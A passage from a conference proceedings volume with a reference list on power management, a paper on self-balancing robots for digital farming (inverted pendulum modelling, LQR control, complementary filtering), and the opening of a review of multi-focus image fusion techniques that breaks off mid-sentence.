ishing returns.
20. Alvarruiz, F., de Alfonso, C., Caballer, M., & Hern’ndez, V. (2012). An energy manager for
high performance computer clusters. In 2012 IEEE 10th International Symposium on Parallel
and Distributed Processing with Applications (ISPA). IEEE (pp. 231–238).
21. Ozturk, O., Kandemir, M., & Chen, G. (2013). Compiler-directed energy reduction using
dynamic voltage scaling and voltage islands for embedded systems. IEEE Transactions on
Computers, 62(2), 268–278.
22. Pedram, M. (2001). Power optimization and management in embedded systems. In Proceedings
of the 2001 Asia and South Pacific Design Automation Conference. ACM (pp. 239–244).
23. Brock, B., & Rajamani, K. (2003). Dynamic power management for embedded systems [soc
design]. In SOC Conference, 2003. Proceedings. IEEE International [Systems-on-Chip]. IEEE
(pp. 416–419).
24. Agarwal, Y., Schurgers, C., & Gupta, R. (2005). Dynamic power management using on demand
paging for networked embedded systems. In Proceedings of the 2005 Asia and South Pacific
Design Automation Conference. ACM (pp. 755–759).
25. Raghunathan, V., & Chou, P. H. (2006). Design and power management of energy harvest-
ing embedded systems. In Proceedings of the 2006 international symposium on Low power
electronics and design. ACM (pp. 369–374).
26. Choi, Y., Chang, N., & Kim, T. (2007). Dc-dc converter-aware power management for low-
power embedded systems. IEEE Transactions on Computer-Aided Design of Integrated Circuits
and Systems, 26(8), 1367–1381.
State-of-the-Art Power Management Techniques 235

27. Park, D., Lee, J., Kim, N. S., & Kim, T. (2010). Optimal algorithm for profile-based power
gating: A compiler technique for reducing leakage on execution units in microprocessors.
In Proceedings of the International Conference on Computer-Aided Design. IEEE Press (pp.
361–364).
28. Pinheiro, E., Bianchini, R., Carrera, E. V., & Heath, T. (2001). Load balancing and unbalancing
for power and performance in cluster-based systems. In Workshop on compilers and operating
systems for low power, Vol. 180. Barcelona, Spain (pp. 182–195).
29. Chase, J. S., Anderson, D. C., Thakar, P. N., Vahdat, A. M., & Doyle, R. P. (2001). Managing
energy and server resources in hosting centers. ACM SIGOPS operating systems review, 35(5),
103–116.
30. Fan, X., Weber, W.-D., & Barroso, L. A. (2007). Power provisioning for a warehouse-sized
computer. ACM SIGARCH Computer Architecture News, 35(2), 13–23.
31. Ranganathan, P., Leech, P., Irwin, D., & Chase, J. (2006). Ensemble-level power management
for dense blade servers. ACM SIGARCH Computer Architecture News, 34(2), 66–77.
32. Femal, M. E., & Freeh, V. W. (2005). Boosting data center performance through non-uniform
power allocation. In Proceedings of 2nd International Conference on Autonomic Computing,
2005. ICAC 2005. IEEE (pp. 250–261).
33. Wang, X., & Chen, M. (2008). Cluster-level feedback power control for performance optimiza-
tion. In IEEE 14th International Symposium on High Performance Computer Architecture,
2008. HPCA 2008. IEEE (pp. 101–110).
34. Skadron, K., Abdelzaher, T., & Stan, M. R. (2002). Control-theoretic techniques and thermal-
rc modeling for accurate and localized dynamic thermal management. In High-Performance
Computer Architecture, 2002. Proceedings. Eighth International Symposium on. IEEE (pp.
17–28).
35. Taffoni, G., Tornatore, L., Goz, D., Ragagnin, A., Bertocco, S., Coretti, I., Marazakis, M.,
Chaix, F., Plumidis, M., Katevenis, M., Panchieri, R., & Perna, G. (2019). Towards exascale:
Measuring the energy footprint of astrophysics hpc simulations. In 2019 15th International
Conference on eScience (eScience) (pp. 403–412).
36. Bianchini, R., & Rajamony, R. (2004). Power and energy management for server systems.
Computer, 37(11), 68–76.
37. Chen, Y., Das, A., Qin, W., Sivasubramaniam, A., Wang, Q., & Gautam, N. (2005). Manag-
ing server energy and operational costs in hosting centers. ACM SIGMETRICS Performance
Evaluation Review, 33(1), 303–314.
38. Raghavendra, R., Ranganathan, P., Talwar, V., Wang, Z., & Zhu, X. (2008). No power struggles:
Coordinated multi-level power management for the data center. ACM SIGARCH Computer
Architecture News, 36(1), 48–59.
39. Narayanan, D., Donnelly, A., & Rowstron, A. (2008). Write off-loading: Practical power man-
agement for enterprise storage. ACM Transactions on Storage (TOS), 4(3), 10.
40. Govindan, S., Choi, J., Urgaonkar, B., Sivasubramaniam, A., & Baldini, A. (2009). Statistical
profiling-based techniques for effective power provisioning in data centers. In Proceedings of
the 4th ACM European conference on Computer systems. ACM (pp. 317–330).
41. Leverich, J., Monchiero, M., Talwar, V., Ranganathan, P., & Kozyrakis, C. (2009). Power man-
agement of datacenter workloads using per-core power gating. IEEE Computer Architecture
Letters, 8(2), 48–51.
42. Liu, J., Zhao, F., Liu, X., & He, W. (2009). Challenges towards elastic power management in
internet data centers. In Distributed Computing Systems Workshops, 2009. ICDCS Workshops’
09. 29th IEEE International Conference on. IEEE (pp. 65–72).
43. Urgaonkar, R., Kozat, U. C., Igarashi, K., & Neely, M. J. (2010). Dynamic resource allocation
and power management in virtualized data centers. In Network Operations and Management
Symposium (NOMS), 2010 IEEE. IEEE (pp. 479–486).
44. Beloglazov, A., & Buyya, R. (2010). Energy efficient resource management in virtualized cloud
data centers. In Proceedings of the 2010 10th IEEE/ACM International Conference on Cluster,
Cloud and Grid Computing. IEEE Computer Society (pp. 826–831).
236 M. Ahmed and W. Ahmed

45. Lin, M., Wierman, A., Andrew, L. L., & Thereska, E. (2013). Dynamic right-sizing for power-
proportional data centers. IEEE/ACM Transactions on Networking (TON), 21(5), 1378–1391.
46. Colarelli, D., & Grunwald, D. (2002). Massive arrays of idle disks for storage archives,” in Pro-
ceedings of the 2002 ACM/IEEE Conference on Supercomputing (pp. 1–11). IEEE Computer
Society Press.
47. Freeh, V. W., & Lowenthal, D. K. (2005). Using multiple energy gears in mpi programs on a
power-scalable cluster. In Proceedings of the tenth ACM SIGPLAN Symposium on Principles
and Practice of Parallel Programming, (pp. 164–173).
48. Moore, J. D., Chase, J. S., Ranganathan, P., & Sharma, R. K. (2005). Making scheduling
“ol” emperature-aware workload placement in data centers. In USENIX Annual Technical
Conference, General Track (pp. 61–75).
49. Heath, T., Centeno, A. P., George, P., Ramos, L., Jaluria, Y., & Bianchini, R. (2006). Mercury and
freon: Temperature emulation and management for server systems. ACM SIGARCH Computer
Architecture News, 34(5), 106–116.
50. Stoess, J., Lang, C., & Bellosa, F. (2007). Energy management for hypervisor-based virtual
machines. In USENIX annual technical conference, (pp. 1–14).
51. Verma, A., Ahuja, P., & Neogi, A. (2008). Pmapper: Power and migration cost aware application
placement in virtualized systems. In Proceedings of the 9th ACM/IFIP/USENIX International
Conference on Middleware. Springer, (pp. 243–264).
52. Leng, J., Hetherington, T., ElTantawy, A., Gilani, S., Kim, N. S., Aamodt, T. M., et al. (2013).
Gpuwattch: Enabling energy optimizations in gpgpus. ACM SIGARCH Computer Architecture
News, 41(3), 487–498.
Application of Robotics in Digital
Farming

Drishti Agarwal, Aakash Mangla, and Preeti Nagrath

Abstract Cultivation is the most labour-intensive field, as most of the work is done
manually by the farmer, which reduces productivity and quality. The cropping fields
are vast and require constant monitoring and care, which is difficult if done manually.
The paper aims at presenting a detailed study of the application of the self-balancing
robot in the field of digital farming and its advantages over the traditional methods.
The study will outline the use of a dynamic system like the inverted cart pendulum for
robot modelling. Further, it discusses the need for filtering techniques in the device
and introducing the theory behind the control system and controllers like the linear
quadratic regulator.

Keywords Accelerometer · Gyroscope · Inverted pendulum · High-pass filter ·


Low-pass filter · Tilt angle · Linear quadratic regulator

1 Introduction

Agriculture evolved through different stages starting from primitive agriculture stage
in which the farmers used to practice traditional methods such as slash and burn
farming methods and shifting cultivation to grow crops and fodder for their self-
sufficiency for their family and cattle needs. Then came the stage of traditional
agriculture which accepted and gave financial and economic value to the profession of
farming. Usage of synthetic fertilizers and pesticides along with electrically powered
machines came into existence and provided agriculture with a business outlook and
big markets. Digital farming which involves the utilization of IoT based devices and
robotics can be used in various fields like:
1. Database maintenance-The digitization in farming provides information about
climatic changes, farm areas in use, financial and economic conditions of the
market, etc. This digital data storage on the database provides easy and swift
access to information to our farmers.

D. Agarwal · A. Mangla (B) · P. Nagrath


Bharti Vidyapeeth’s College of Engineering, New Delhi, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 237
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_19
238 D. Agarwal et al.

2. Realtime data collection-IoT and digitization together can achieve this task as
the various sensors can be employed to monitor the farmlands, soil, the vegetation
of the field, humidity, and moisture content of the soil. All this data collected is
updated in the database.
3. Geographical information system (GIS)-GIS is one of the most powerful tech-
nological tools that can study the geography of an area and form intelligent deci-
sions. The GIS model is employed with CPS, i.e. the central processing system.
The CPS is responsible for storing the data, storing the results generated by the
GPS model, and implementing them by instructing the digitized machinery.
4. Digitized agriculture machinery (DAM)-Through the analysis made by GIS and
GPS model together with the digitized agriculture machinery such as digitized
fertilizer control device, sowing device, irrigation control device, etc. perform
their operation on-field and store the real-time data over the database accordingly.
Before the onset of digitization in the field of agriculture, most of the tasks were
performed manually by the farmer, but today with advancement in technology, we
are provided with ample resources to reduce manual labour, thus reducing the highly
tiring and difficult fieldwork. Internet of things [1] is a branch of technology that
provides us with devices that can collect the data through sensors and can develop
a network layer for data processing and transmission. A self-balancing robot has
a complex structure and design along with the dynamic motion, as a result of this
the construction and development of the robot is a tedious task, but the following
advantages of the device outweigh the development cost:
1. The Manoeuvrability-The ability of the device to move freely defines its manoeu-
vrability. Self-balancing robots are highly proficient in terms of manoeuvrability
due to the reduction in its turn radius. A four or three-wheeled robot will cover
a greater radius at turns due to structural limitations, but a two-wheeled self-
balancing robot reduces this turn radius value to zero, thus covering the minimum
area.
2. Stability-A two-wheeled self-balancing robot can balance itself in any given
terrain, which makes them suitable for travelling and transporting loads from one
place to another across uneven fields and land.
The advantages of a self-balancing robot make it a device suitable in the field of
digital agriculture, as agricultural plots and lands are uneven surfaces, that hinder the
movement of normal three or four-wheeled devices but with efficient manoeuvrability
and minimum turn radius, a self-balancing robot can easily traverse the fields for
monitoring purposes. In addition to this, a two-wheeled robot has reduced wheels
and a sleek and narrow-body structure, which makes it compact, thus increases
the locomotive capabilities across a crop field without damaging the crops. A two-
wheeler robot when loaded with the required sensors, will reduce manual labour by
technically monitoring the farmlands and providing real-time data through wireless
communication.
This paper presents an in-depth analysis of the application of such robots in digital
farming, as explained in Sect. 1. The main aim is the system modelling through
Application of Robotics in Digital Farming 239

the inverted cart pendulum system that can be seen in Sect. 3 of the paper. Further,
Sect. 4 explains the concept of control systems, followed by the introduction to linear
quadratic regulator. Finally, Sect. 5 explains the implementation of filters for sensor
data through mathematical equations.

2 Literature Review

The two-wheeler robot emerged in the year 1986 under the guidance of Kazua Yama-
fuji who was a professor at Tokyo’s University of Electro-Communications. He
invented a robot similar to the inverted pendulum system which can effectively tra-
verse the ground with two wheels. Since then, this type of robot system has been
widely used in almost all fields, especially agriculture. There are multiple techniques
to construct this device either by using different control system and controller method
or by varying the type of filter. The paper [2] utilises augmented PID to stabilise
the robot based on the inverted cart pendulum. Similarly, the paper [3] shows the
implementation of the linear quadratic regulator technique for balancing. Also, using
unique sensors provide new features to robot improving its functionality, as seen in
paper [4] that shows the implementation of ultrasonic sensors to avoid obstacles.
Further, the motion sensors require filters which remove redundant signals or noise
from the data. The paper [5] employs a complementary filter for two-wheeler robot
and presents the disadvantages of Kalman filter for this purpose.

3 The Inverted Pendulum System

An inverted pendulum system is highly unstable and non-linear. This nature is the
virtue of its centre of mass being above the pivot point. This dynamic system mod-
elling is used in two-wheeled robots due to similarity in the structure and non-
linearity.
In Fig. 1, the point around which the pendulum is showing motion is the pivot
point. Due to gravity g, the pendulum has moved to a certain angle from the vertical
axis. So, the equation of torque generated by the system can be:

T = mgl sin ϕ (1)

So, by using this equation an Euler-Lagrange rule we derive the following equa-
tions: g
ϕ̈g = sin ϕ (2)
l


ϕ̈x = cos ϕ (3)
l
240 D. Agarwal et al.

Fig. 1 System of inverted


cart pendulum

Now, the resulting rotational acceleration can be given as:

g ẍ
ϕ̈ = ϕ̈g + ϕ̈x = sin ϕ − cos ϕ (4)
l l
Using Laplace [6] method in the above equation will generate the transfer function
of the system.

4 Control Systems and Controllers

A device, machine, or a system is developed by interconnection [7] and communica-


tion between the different components of that system. For the system, it is necessary
to produce certain response and output to accomplish the aim of its development,
thus control system is the branch of control engineering that deals with studying
the response of the system to maintain the generation of desired output with var-
ied input and ensuring the stability of the system in different real-world scenarios.
The control system has been a part of some historical inventions by ancient civiliza-
tions to develop system catering to the needs of human activities. The configuration
of the system’s element decides the type of control system to be applied. The two
most commonly used are open-loop control systems and closed-loop control sys-
tems. Open-loop configuration employs controllers and actuators to determine the
response and output of the system (Fig. 2).

Fig. 2 Diagrammatic
representation open-loop
configuration [7]
Application of Robotics in Digital Farming 241

Fig. 3 Diagrammatic representation closed-loop configuration [7]

Closed-loop configuration has a very important feature of feedback control the


sensors installed in the system provide feedback signal and the system further goes
on into finding the deviation of actual output from the desired output (Fig. 3).
While working on such systems, the developers must study the modelling of the
system, its complexity, and configuration design along with the physical application
of it in the real-world situation because the selection of the control system requires
the involvement of the device and its environment of functioning. For example, a
control system algorithm responsible for switching on/off an air conditioning device
may vary in functioning according to the room where the device is installed.
The methodology and functioning of the control system can be seen through
controllers. These are techniques which are applied based on of modelling of the
system to study its input signal, output generated, its response and the feedback.
These controllers tend to reduce noise from the signal apart from its other functions,
thus, ensuring a highly stable dynamic system. Two-wheeler robots are balanced
using linear quadratic regulator method of the control system. LQR [8] works on the
principle of cost function given as:


n
J= (xkT Qxk + u kT Ru k ) (5)
K =0

For the system, the LQR method finds out the gain matrix to stabilise the feedback
from the system:
u (t) = −K x˙ (6)

5 Tilt Angle and Its Measurement Using the Filter

The technology around us tends to generate data in the forms of image, audio, video,
speech, etc. All this data is accepted, received, and transmitted in the form of a
signal or waves to be precise. The signals generated from the data are readable by
devices and machines to process them further. Thus, the field of analysis, production,
and modifications of the signals is known as signal processing. The field of signal
processing helps in the functioning of sensors. It can efficiently reduce noise in the
242 D. Agarwal et al.

signal, analyse and read data encoded in the signal, convert it from one form to
another, and much more. Generally, these signals are classified in various categories
such as analog, digital, discrete-time, etc. An important process in this field is filtering
of signals [9] as the name suggests filtering is performed to obtain the required
frequency of the wave or the signal passed through it. This is done to reduce or
attenuate the effects of noise which gets added to the signal, while passing through
several components of the device and the device used in this process is a filter.
There is no simple hierarchical classification of filters, they may be non-linear or
linear, time-variant or time-invariant, causal or not-causal, analog or digital, passive
or active, etc. A self-balancing robot requires a frequency filter circuit to improve
the signal or data obtained from the sensor employed to measure the tilt angle [10].
This type of filter tends to suppress a specific value of frequency not required in the
signal processing and is leading to noise.
These filters that discriminate signal based on the range of frequency can be
classified as low pass and high pass filters, that will be used further for processing
sensor data.
A low pass filter [9, 11] efficiently rejects all the frequencies ranges lying above
the cut-off frequency thus accepting only low-frequency ranges. From Fig. 4, we can
infer that the amplitude at frequencies w1 and w2 are equal, but once passed through
the filter there is a significant change as w2 reduces tremendously indicating that the
frequencies higher than wc were attenuated and w1 was allowed to pass through the
filter.
A high pass filter [9, 11] efficiently rejects all the frequency ranges lying below
the cut-off frequency thus accepting only high-frequency ranges. From Fig. 5, we can
infer that the amplitude at frequencies w1 and w2 are equal, but once passed through
the filter there is a significant change as w1 reduces tremendously indicating that the
frequencies lower than wc were attenuated and w2 was allowed to pass through the

Fig. 4 Low-pass filter (graphical representation)


Application of Robotics in Digital Farming 243

Fig. 5 High-pass filter (graphical representation)

Fig. 6 Diagram for complementary filter

filter. A high-pass filter and a low-pass filter together form a complementary filter
which provides the functionality and features of both the filters.
In Fig. 6 given above, the signals x and y are the measurements of noise [12] in
a collective signal z which contains both x and y. Ẑ is the measurement of output
produced by the filter. Now let us assume that the y noise measurement represents
signals of high frequency and, x, on the other hand, represents a noise signal of
low frequency. So, to reduce these noises accordingly, y is made to pass through
a low-pass filter G(s) that accepts a low range of frequency, thus attenuating the
high-frequency noise signal. Further, the x noise signal is made to pass through a
complement of G(s) i.e., 1 − G(s), also known as a high pass filter to attenuate low-
frequency noise signals. Thus, a complementary filter intelligently reduces noise
depending upon the frequency of signals. Now, the robot is employed with GY-87
device, for studying the tilt and motion of the complete system. This device reads
gyroscope data and accelerometer data for all the 3 axes. Now the set of 12 values
obtained are combined with the help of these filters to give final result in terms of
tilt angle. The readings are obtained as follows (Fig. 7).
As the name suggests accelerometer is a device used to measure the rate of change
of velocity of a system in its instantaneous domain. The accelerometer has its disad-
vantage in terms of its response time to the changing tilt angle which is fairly slow on
the other hand the gyroscope uses angular velocity to calculate the shift in the incli-
nation of the robot. But in gyroscope, the value changes rapidly over time. So, these
244 D. Agarwal et al.

Fig. 7 Readings obtained from the sensors

filters show opposite behaviour to each other as accelerometer fails to work accord-
ingly in the presence of gravity and gyroscopes show faulty readings, while moving
in plains. Complementary filter sorts and filters the data from both the devices in a
way that the noise is reduced to minimal value and we get the accurate readings. Now
the filter is implemented in the Arduino code in the form of the equation. When the
robot shows any change in its orientation the GY-87 sensor produces values through
accelerometer and gyroscope. Now this data must be processed to attenuate noise
and this is done by the following equations: The equation for high pass filter:

S(n) = (1 − φ).S(n − 1) + (1 − φ).(s(n) − s(n − 1)) (7)

Here, s(n) is the value from the gyroscope and S(n) is the actual angle that will be
used in the next cycle of the program. The above equation will determine your values
for the gyroscope.
The equation for low pass filter:

S (n) = (1 − φ) .s (n) + φ.S (n − 1) (8)

Here, s(n) is the value from the accelerometer and S(n) is the actual angle that will
be used in the next cycle of the program. The above equation will determine your
values for the accelerometer. Now, we will combine pitch values from these filters
together in the form of the complementary filter so as generate real-time tilt value
of the robot. Although accelerometer alone could have generated the pitch value
addition of gyroscope makes the robot movable in all kinds of high and low surfaces
and even on-ramps. Hence, the pitch angle is:

data = tan −1(arr[1]/abs(arr[2])) (9)

Here, arr [1] is the value of accelerometer for y-axis and arr [2] is the value of
accelerometer for z-axis. Combining this with the gyroscope values for x-axis and
the final equation of the complementary is as follows:
Application of Robotics in Digital Farming 245

tilt = (1 − φ)(tilt + gyr ∗ dt) + φ(data) (10)

alpha can be calculated as:


φ = (τ )/(τ + dt) (11)

where τ is the time constant and dt = 1/ f s where f s is your sampling frequency.

6 Conclusion

The research paper worked through the history of agriculture and explained the
evolution of farming techniques that lead to digitisation [13]. Application of IoT
based devices in this field is explained thoroughly along with the detailed study on
the benefits and advantages of the Two-Wheeler robot in cultivation. Further, we saw
the system modelling through inverted pendulum system where the torque’s equation
was used in the Euler-Lagrange rule to find the resultant rotational acceleration. The
paper practically implemented the complementary filter by working through the
concept of high-pass and low filter. The mathematical equations for the two were
determined and combined to find out the tilt angle. The GY-87 sensor data used to
calculate the tilt angle had minimal noise due to these filters. Finally, the controller
opted for the robot’s balancing is a Linear Quadratic Regulator described briefly.

References

1. Zhang, W. (2011). Study about IOT’s application in “Digital Agriculture” construction. In


2011 International Conference on Electrical and Control Engineering. https://doi.org/10.1109/
iceceng.2011.6057405
2. Siradjuddin, I., Amalia, Z., Setiawan, B., Ronilaya, F., Rohadi, E., Setiawan, A., Rahmad,
C., & Adhisuwignjo, S. Malang State Polytechnic, Stabilising a cart inverted pendulum with
an augmented PID control scheme, Electrical Engineering Department, Malang, Indonesia
Malang State Polytechnic, Information Technology Department, Malang, Indonesia
3. Kim, Y., Kim, S. H., & Kwak, Y. K. (2005). Dynamic Analysis of a Nonholonomic Two-
Wheeled Inverted. Journal of Intelligent and Robotic Systems, 44, 25–46; Pendulum Robot
Department of Mechanical Engineering, KAIST, 373–1 Guseong-dong, Yuseong-gu, Daejeon,
305–701. South Korea. https://doi.org/10.1007/s10846-005-9022-4.
4. Ruan, X., & Li, W. (2014). Ultrasonic sensor based two-wheeled self-balancing robot obsta-
cle avoidance control system. In 2014 IEEE International Conference on Mechatronics and
Automation, Tianjin, pp. 896–900. https://doi.org/10.1109/ICMA.2014.6885816.
5. Madhira, K., Gandhi, A., & Gujral, A. (2016). IEEE 2016 International Conference on Electri-
cal, Electronics, and Optimization Techniques (ICEEOT) - Chennai, India (2016.3.3-2016.3.5)
6. Krishna, B. S. B. V., & Rao, P. M. (2016). Implementation of two wheeled self balancing
platform.
7. Fernández de Cañete, J., Galindo, C., & Moral, I. G. (2011). In Introduction to Control Systems.
System Engineering and Automation, pp. 137–165. https://doi.org/10.1007/978-3-642-20230-
8_5.
246 D. Agarwal et al.

8. Stanese, M., Susca, M., Mihaly, V., & Nascu, I. (2020). Design and control of a self-balancing
robot. In 2020 IEEE International Conference on Automation, Quality and Testing, Robotics
(AQTR). https://doi.org/10.1109/aqtr49680.2020.9129935
9. Kolawole, E. S., Ali, W. H., Cofie, P., Fuller, J., Tolliver, C., & Obiomon, P. (2015). Design
and implementation of low-pass, high-pass and band-pass finite impulse response (FIR) filters
using FPGA. Circuits and Systems, 6, 30–48.
10. Gonzalez, C., Alvarado, I., Muñoz, P. D., & La,. (2017). Low cost two-wheels self-balancing
robot for control education. IFAC-PapersOnLine, 50(1), 9174–9179. https://doi.org/10.1016/
j.ifacol.2017.08.1729.
11. Ochala, I., Gbaorun, F., & Okeme, I. C. Department of Physics, Kogi State University, Anyigba
Department of Physics, Benue State University, Makurdi Design and implementation of a filter
for low-noise applications
12. Higgins, W. (1975). A comparison of complementary and Kalman filtering. IEEE Transactions
on Aerospace and Electronic Systems, AES-11(3), 321–325. https://doi.org/10.1109/taes.1975.
308081
13. Tang, S., Zhu, Q., Zhou, X., Liu, S., & Wu, M. (n.d.). A conception of digital agriculture.
In IEEE International Geoscience and Remote Sensing Symposium. https://doi.org/10.1109/
igarss.2002.1026858
14. Molnar, J., Gans, S., & Slavko, O. (2020). Design and implementation self-balancing robot.
In 2020 IEEE Problems of Automated Electrodrive. Theory and Practice (PAEP). https://doi.
org/10.1109/paep49887.2020.9240815
15. Conference on Advanced Intelligent Systems and Informatics 2018 Vol. 845 || Self-balancing
Robot Modeling and Control Using Two Degree of Freedom PID Controller. 10.1007/978-3-
319-99010-1(Chapter 6), 64–76. https://doi.org/10.1007/978-3-319-99010-16
Study and Performance Analysis
of Image Fusion Techniques
for Multi-focus Images

Vineeta Singh and Vandana Dixit Kaushik

Abstract The primary objective behind image fusion technique is to collect and
integrate all the essential as well as relevant features and information in a solitary
image. In case of multi-focus image fusion technique, the procedure involves accu-
mulation of information out of the focused regions from the input images and final
combined outcome (image) will contain all the focused regions as well as objects.
There have been several studies in regard to multi-focus image fusion technique in
the area of spatial domain as well as transform domain. The issue of appearance of
non-focused regions or objects in an image happens due to limited depth of field of
the camera lens. As a result, objects present in the focused region of the camera lens
appears focused and others appear as un-focused. Image fusion technique is a scheme
to overcome this issue. In this paper, authors have reviewed recent fusion-based tech-
niques and tested certain image fusion techniques, i.e., discrete wavelet transform,
i.e., DWT, independent component analysis, in short, ICA, sparse representation, i.e.,
SR, dual-tree complex wavelet transform, i.e., DTCWT, non-subsampled contourlet
transform abbreviated as NSCT, and a hybrid of NSCT + SR, on Lytro multi-
focus image dataset and comparatively analyzed these methods on fusion metrics
nonlinear correlation information entropy (NCIE), normalized mutual information
(NMI), gradient-based metric(GBM), phase congruency-based metric (PCB). Anal-
ysis has demonstrated that NSCT + SR has given best performance results with a
NCIE of 0.842, NMI of 1.121, GBM of 0.759, and PCB of 0.848, while method SR
has given second best performance result. Authors have also elucidated regarding
the essential requirements to consider while framing any fusion-based scheme.

Keywords Image fusion techniques · DWT · ICA · DTCWT · SR · NSCT ·


Performance analysis · NCIE · GBM · NMI · PCB · Multi-focus images ·

V. Singh (B) · V. D. Kaushik


Department of Computer Science and Engineering, Harcourt Butler Technical University, HBTU
East Campus, Nawabganj, Kanpur 208002, Uttar Pradesh, India
e-mail: vineeta.singh.cs@gmail.com
V. D. Kaushik
e-mail: vdkaushik@hbtu.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 247
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_20
248 V. Singh and V. D. Kaushik

Performance analysis · Multi-focus image fusion techniques · Multi-focus image


fusion

Abbreviations

cA Coefficient of approximation
cH Horizontal component
cV Vertical component
cD Diagonal component

1 Introduction and Background of the Work

Limited depth of field of the camera creates hurdle in capturing all the objects at a
time under focus. This is the reason sometimes we don’t get a picture clicked focused
at all, i.e., picture possess some objects blurred or not focused [1–5]. This is the point
where need of multi-focus image fusion arises. Similarly, in medical field, there are
high-cost instrument machines to capture the modality of the human organs but it
has also its limitations as well as to avoid the high cost of the medical imaging,
fusion concept has a very important role to play here also as well so that the medical
practitioner and radiologist are able to diagnose a disease accurately [6, 7]. Fused
modality image will possess all the required pertinent information. Image fusion
application areas include microscopic imaging, medical imaging, remote sensing,
and geographical imaging [8–13].
A satellite is utilized to analyze and examine a remote location in remote sensing
area, for example, an area of earthquake is examined for the estimation and detec-
tion of damages. During research and development, it is found that in different
fields’ image processing also requires images with high resolution as well as spectral
images [14–16]. Therefore, images taken by various satellites, for example, SPOT
PAN, etc., undergo an image fusion procedure to get the high-resolution image [16–
19]. Different types of cameras capture different kinds of images, such as, infrared
cameras produce pictures to lie in infrared spectrum, while digital cameras produce
images to lie in visible spectrum. Both kinds of sensors produce images comple-
mentary to one another, such as, in case of surveillance purpose, better analysis can
be accompanied via both kind of image information. Therefore, concept of image
fusion plays a very important role for analysis and understanding purpose [20–22].
Application areas also include human perception, computer vision, and machine
perception, and image fusion concept also minimizes the cost of image transmission
[8, 23, 24]. Cost of image transmission is minimized via transmitting single fused
image in place of different images having different focus areas of similar scene.
Various image fusion schemes have been proposed in image processing research
Study and Performance Analysis … 249

FUSION
RULE

Combined Image

Source Image a, b

Fig. 1 Multi-focus image fusion sample diagram

field [25–32]. In this research paper, authors have reviewed recent research papers
for multi-focus image fusion schemes and effectiveness has been evaluated with
performance metrics. Figure 1 illustrates the sample diagram for multi-focus image
fusion concept.

2 Image Fusion Techniques and Effectiveness Criteria

In the literature, different algorithms exist to execute image fusion model, where for
producing effective results certain conditions are needed to be followed [24, 33, 34]
as following:
• Important information from the source images should be preserved.
• Irrelevant information should be minimized or omitted from the fused image.
• Inconsistencies should not be the part of the fused image.
• Noise should be minimum or omitted from the final fused image.
Image fusion schemes are mainly classified in two main categories: Transform
domain as well as spatial domain [20, 35, 36]. Spatial domain fusion schemes are
implemented directly on the pixel values. Localized spatial features of images include
pixel or region in an image, and these are the main fusion pillars in case of spatial
domain fusion scheme [20, 32, 34, 37–52]. In spatial domain fusion procedure,
focused regions taken out of the input images are inhaled for consideration that may
250 V. Singh and V. D. Kaushik

be in terms of pixels or features depicting focused part of the image. There are focus
measures to categorize the input images focused regions, like, Laplacian energy as
well as spatial frequency. Spatial domain fusion schemes are moreover classified into
three categories such as: decision level fusion schemes, pixel-level fusion schemes,
and feature level fusion schemes [53–57].
In case of image fusion scheme relied on transform domain, transform coefficients
are generated out of the source images [18, 32]. Further, fusion of these coefficients
is accompanied to obtain final image coefficients and moreover inverse transform
is applied to get the final fused image. Transform domain-based fusion schemes
includes discrete cosine transform [58], wavelet transformation [29, 59, 60]. Trans-
form domain has better fusion capabilities as compared to spatial domain methods,
because, transform domain fusion schemes involve better representation of salient
features accurately as well as clearly. In terms of implementation, the kind of trans-
form technique is consumed, it may be categorized as, wavelet based fusion schemes
[24, 28, 59, 61–66], discrete cosine transform based fusion schemes [22, 58, 67, 68],
as and curvelet transform based fusion schemes [18, 66].

3 Some Current Image Fusion Techniques

3.1 Discrete Wavelet Transform

In DWT, here two input images are taken, wavelet transform is applied, further
coefficients are generated, and inverse of DWT is applied to produce final fused
image. In DWT, mainly two parts are generated: approximation part and detailed
part. For instance: [cA, cH, cV, cD] = dwt2(X,wname), it calculates the 2-D discrete
wavelet transform, abbreviated as DWT, at single level, where X denotes the input
data. And dwt2, wname returns the cA (approximation coefficients matrix) and cH,
cV, and as well as cD (detail coefficients matrices) representing horizontal, vertical,
and diagonal, consecutively.

3.2 Discrete Cosine Transform (DCT)

Frequency domain is utilized here to fuse the images. Under this category, image
fusion methods based on average measures are considered. In case of advanced DCT
methodology, the enhanced version of the direct DCT-based image fusion model is
gained out of the DCT portrayal of the melded image by decomposition of images
further into blocks at that point computes portrayal of the DCT by considering the
average taken of the whole DCT portrayals for respective blocks. At last, by taking
the reverse discrete cosine transform the final fused image is gained. In reality, this
image fusion strategy is known as modified or “enhanced” DCT technique.
Study and Performance Analysis … 251

3.3 Curvelet Transform

Curvelet transform is an enhancement of wavelet transform. Image fusion process


by curvelet transform for fusing image involves following steps:
• Register input images.
• Analyze each of the input images and generate the curvelet coefficients.
• Use maximum frequency rule to fuse the curvelet coefficients.
• Use inverse curvelet transform to obtain the final fused image.

3.4 Non-Subsampled Contourlet Transform

In this technique, each image is broken into low frequency components as well as
high-frequency components. As per the frequency components, two input images
are melded with each other via directive contrast in case of high frequency, more-
over stage congruency in case of low frequencies for the purpose of fusion process.
The final fused image is yielded after implying inverse non-subsampled contourlet
transform (inverse NSCT).

3.5 Sparse-Based Image Fusion Scheme

Sparse-based image fusion model works in the following manner. In this input image,
signals are reused as a straight line integration of a “certain” elements out of a
pre-trained dictionary, where the sparse coefficients demonstrate the input image
characteristics. Steps can be summarized as:
(i) Input images are broken down into overlapping patch segments, and every
patch is rewritten as a vector.
(ii) Sparse representation operation is done on input image patches via trained
dictionaries.
(iii) Apply some fusion method and fuse the sparse representation segments.
(iv) Produce the final fused output images with the help of their respective sparse
denotations.

3.6 DTCWT

A new fusion-based technique was evolved in [69] which were relied on DTCWT,
i.e., dual-tree complex wavelet transform. It had better advantages as compared to
traditional DWT in terms of shift invariance and directional selectivity.
252 V. Singh and V. D. Kaushik

3.7 ICA

ICA stands for independent component analysis [70]. In ICA-based image fusion
technique images were broken into ICA bases. Moreover, especially to break the
source images to create patches, sliding window technique was consumed, and
further, every patch was transformed into ICA domain. Further, transform coeffi-
